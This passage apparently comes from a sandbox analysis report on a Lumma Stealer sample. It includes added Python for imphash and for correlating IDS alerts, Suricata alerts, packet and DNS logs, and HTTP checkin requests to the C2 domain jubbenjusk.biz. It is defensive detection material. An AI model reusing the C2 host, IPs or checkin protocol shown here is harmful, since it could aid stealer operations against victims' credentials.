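            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        for f in funcs:
            name = f"ord{f}" if isinstance(f, int) else f.lower()
            parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports):
    """MD5 hex digest of the normalised import string."""
    return hashlib.md5(normalize_imports(imports).encode("ascii")).hexdigest()


# Constructed input: the first entries of the KERNEL32.dll import list above, in the order shown there.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", ["SearchPathW", "SetThreadContext", "DeleteTimerQueueEx", "DebugActiveProcessStop",
                      "CreateProcessW", "SetWaitableTimer", "GetConsoleAliasA", "InterlockedDecrement"]),
]

if __name__ == "__main__":
    print(normalize_imports(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

Two properties make imphash useful for clustering and also easy to defeat: the hash is order-sensitive, so a linker that emits the same functions in a different sequence yields a new value, and it is case-insensitive, so `KERNEL32.DLL` and `kernel32.dll` collapse to the same string. Imports resolved at runtime through `GetProcAddress` (both `LoadLibraryA/W` and `GetProcAddress` appear in the list above) never enter the hash at all.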
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T07:10:18.418393+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:18.931017+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:18.931017+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.439977+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.934991+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.934991+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:20.812997+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49712 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:21.395869+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49712 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:22.083957+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49714 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:23.471175+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49721 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:25.479834+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49737 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:26.543060+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49743 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:27.536844+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49749 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:27.969739+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49749 | 172.67.219.181 | 443 | TCP
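The alert table mixes two kinds of signal: the severity-3 JA3 rule (SID 2028371) fires on every TLS connection whose client fingerprint matches, including the four flows (49714, 49721, 49737, 49743) on which nothing else triggered, while the severity-1 Lumma checkin and exfiltration rules confirm a flow as C2. A SOC rule keyed only on the JA3 SID would be noisy; one that requires a confirming SID on the same 5-tuple is what isolates the four C2 flows. The following is an added example, not part of the Joe Sandbox report or of Suricata, that performs that correlation over the rows above (transcribed into `SAMPLE_ALERTS` as constructed pipe-separated input). Treating only SID 2028371 as a weak lead is this example's assumption; adapt `WEAK_SIDS` to the fingerprint-only rules in your own ruleset.

```python
from collections import defaultdict

# Constructed input: the fourteen alert rows from the table above, pipe-separated as
# Timestamp|SID|Signature|Severity|Source IP|Source Port|Dest IP|Dest Port|Protocol.
SAMPLE_ALERTS = """\
2025-01-12T07:10:18.418393+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49710|172.67.219.181|443|TCP
2025-01-12T07:10:18.931017+0100|2049836|ET MALWARE Lumma Stealer Related Activity|1|192.168.2.6|49710|172.67.219.181|443|TCP
2025-01-12T07:10:18.931017+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.6|49710|172.67.219.181|443|TCP
2025-01-12T07:10:19.439977+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49711|172.67.219.181|443|TCP
2025-01-12T07:10:19.934991+0100|2049812|ET MALWARE Lumma Stealer Related Activity M2|1|192.168.2.6|49711|172.67.219.181|443|TCP
2025-01-12T07:10:19.934991+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.6|49711|172.67.219.181|443|TCP
2025-01-12T07:10:20.812997+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49712|172.67.219.181|443|TCP
2025-01-12T07:10:21.395869+0100|2048094|ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration|1|192.168.2.6|49712|172.67.219.181|443|TCP
2025-01-12T07:10:22.083957+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49714|172.67.219.181|443|TCP
2025-01-12T07:10:23.471175+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49721|172.67.219.181|443|TCP
2025-01-12T07:10:25.479834+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49737|172.67.219.181|443|TCP
2025-01-12T07:10:26.543060+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49743|172.67.219.181|443|TCP
2025-01-12T07:10:27.536844+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49749|172.67.219.181|443|TCP
2025-01-12T07:10:27.969739+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.6|49749|172.67.219.181|443|TCP
"""

# SIDs treated as weak, fingerprint-only leads (assumption for this example: the JA3 rule alone
# also fires on benign clients that share the TLS fingerprint).
WEAK_SIDS = frozenset({2028371})


def parse_alerts(text):
    """Turn the pipe-separated rows into dicts keyed for correlation; the 5-tuple is the flow key."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("|")
        rows.append({"ts": ts, "sid": int(sid), "signature": sig, "severity": int(sev),
                     "flow": (src, int(sport), dst, int(dport), proto)})
    return rows


def correlate_flows(alerts, weak_sids=WEAK_SIDS):
    """Group alerts by 5-tuple. A flow is confirmed when any SID outside the weak set fired on it."""
    flows = defaultdict(lambda: {"sids": set(), "min_severity": 9, "first_seen": None})
    for a in alerts:
        f = flows[a["flow"]]
        f["sids"].add(a["sid"])
        f["min_severity"] = min(f["min_severity"], a["severity"])
        if f["first_seen"] is None:
            f["first_seen"] = a["ts"]
    for f in flows.values():
        f["confirmed"] = bool(f["sids"] - weak_sids)
    return dict(flows)


def triage(alerts):
    """Split flows into confirmed vs. weak-only, and count (total, confirmed) flows per destination host."""
    flows = correlate_flows(alerts)
    per_dest = defaultdict(lambda: [0, 0])
    for (_src, _sport, dst, _dport, _proto), f in flows.items():
        per_dest[dst][0] += 1
        per_dest[dst][1] += int(f["confirmed"])
    return {
        "confirmed_ports": sorted(k[1] for k, f in flows.items() if f["confirmed"]),
        "weak_only_ports": sorted(k[1] for k, f in flows.items() if not f["confirmed"]),
        "per_dest": {host: tuple(counts) for host, counts in per_dest.items()},
    }


if __name__ == "__main__":
    print(triage(parse_alerts(SAMPLE_ALERTS)))
```

The per-destination count is the piece worth alerting on: eight short-lived TLS connections from one host to one IP within ten seconds, half of them carrying a confirming C2 signature, is a much stronger case for isolating 192.168.2.6 than any single alert in the list.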
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 07:10:17.897448063 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:17.897494078 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:17.897641897 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:17.923331976 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:17.923347950 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.418221951 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.418392897 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.421354055 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.421365976 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.421782970 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.465092897 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.518021107 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.518021107 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.518235922 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.931106091 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.931354046 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.931508064 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.949238062 CET | 49710 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.949258089 CET | 443 | 49710 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.975301027 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.975395918 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:18.975507021 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.975815058 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:18.975833893 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.439739943 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.439976931 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.480380058 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.480454922 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.481492996 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.487337112 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.487361908 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.487546921 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.934998989 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935076952 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935129881 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935178041 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935225010 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.935225964 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.935255051 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935296059 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935364008 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.935380936 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935446978 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.935497999 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.935511112 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.939712048 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.939774036 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.939785004 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.939799070 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.939863920 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:19.939876080 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:19.980637074 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.021764994 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.022100925 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.022185087 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.022313118 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.022355080 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.022387981 CET | 49711 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.022412062 CET | 443 | 49711 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.347800970 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.347846031 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.347975016 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.348383904 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.348404884 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.812886000 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.812997103 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.815239906 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.815249920 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.815674067 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:20.817414045 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.817574024 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:20.817624092 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:21.395937920 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:21.396193027 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:21.396332026 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:21.396559954 CET | 49712 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:21.396583080 CET | 443 | 49712 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:21.597760916 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:21.597810984 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:21.597924948 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:21.598347902 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:21.598367929 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.083857059 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.083956957 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.085709095 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.085716963 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.086066961 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.087614059 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.087749004 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.087790012 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.087846994 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.131330967 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.572355032 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.572485924 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:22.572565079 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.599601030 CET | 49714 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:22.599627972 CET | 443 | 49714 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:23.002028942 CET | 49721 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:23.002126932 CET | 443 | 49721 | 172.67.219.181 | 192.168.2.6
Jan 12, 2025 07:10:23.002228022 CET | 49721 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:23.002687931 CET | 49721 | 443 | 192.168.2.6 | 172.67.219.181
Jan 12, 2025 07:10:23.002722025 CET | 443 | 49721 | 172.67.219.181 | 192.168.2.6
                                                    Jan 12, 2025 07:10:23.471072912 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.471174955 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.472592115 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.472614050 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.472894907 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.474606991 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474791050 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474836111 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.474911928 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474929094 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.105942965 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.106036901 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.106229067 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:24.106395006 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:24.106436968 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.021264076 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021368027 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.021482944 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021883965 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021919966 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.479720116 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.479834080 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.485322952 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.485357046 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.485743046 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.488622904 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.488910913 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.488926888 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933140039 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933269024 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933332920 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.933552980 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.933583975 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.075051069 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075107098 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.075524092 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075524092 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075567961 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.542896986 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.543060064 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.544321060 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.544329882 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.544579029 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.545864105 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.545941114 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.545948982 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030633926 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030769110 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030879974 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.031160116 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.031192064 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.079268932 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079299927 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.079472065 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079971075 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079982042 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.536717892 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.536844015 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.538532019 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.538538933 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.538862944 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.540529966 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.540529966 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.540620089 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.969752073 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.969902992 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.972623110 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973192930 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973210096 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.973222971 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973228931 CET44349749172.67.219.181192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 07:10:17.881597996 CET | 56934 | 53 | 192.168.2.6 | 1.1.1.1
Jan 12, 2025 07:10:17.893162012 CET | 53 | 56934 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 07:10:17.881597996 CET | 192.168.2.6 | 1.1.1.1 | 0xd2a5 | Standard query (0) | jubbenjusk.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 07:10:17.893162012 CET | 1.1.1.1 | 192.168.2.6 | 0xd2a5 | No error (0) | jubbenjusk.biz | | 172.67.219.181 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:10:17.893162012 CET | 1.1.1.1 | 192.168.2.6 | 0xd2a5 | No error (0) | jubbenjusk.biz | | 104.21.38.63 | A (IP address) | IN (0x0001) | false
                                                    • jubbenjusk.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:10:18 UTC | 261 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: jubbenjusk.biz
2025-01-12 06:10:18 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
2025-01-12 06:10:18 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=rkca962foc9dd1nf36pjrpauh7; expires=Wed, 07 May 2025 23:56:57 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTJucYzdw3tBuc2M8i42FJu7CiDDhgQL4hc6gZ4cXTttYJk8UaTTqUjf7AbNV%2F6LOyPuQUfwyEiGKrTrPhhrJA17CG1OnMTlF4zzaaiU7tFc3uM%2Fu7x6BkxYIPHV%2Bs5p1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afb920b260cb8-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2413&min_rtt=1690&rtt_var=1150&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1727810&cwnd=179&unsent_bytes=0&cid=729193da108e587e&ts=535&x=0"
2025-01-12 06:10:18 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
2025-01-12 06:10:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:10:19 UTC | 262 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 86
                                                    Host: jubbenjusk.biz
2025-01-12 06:10:19 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
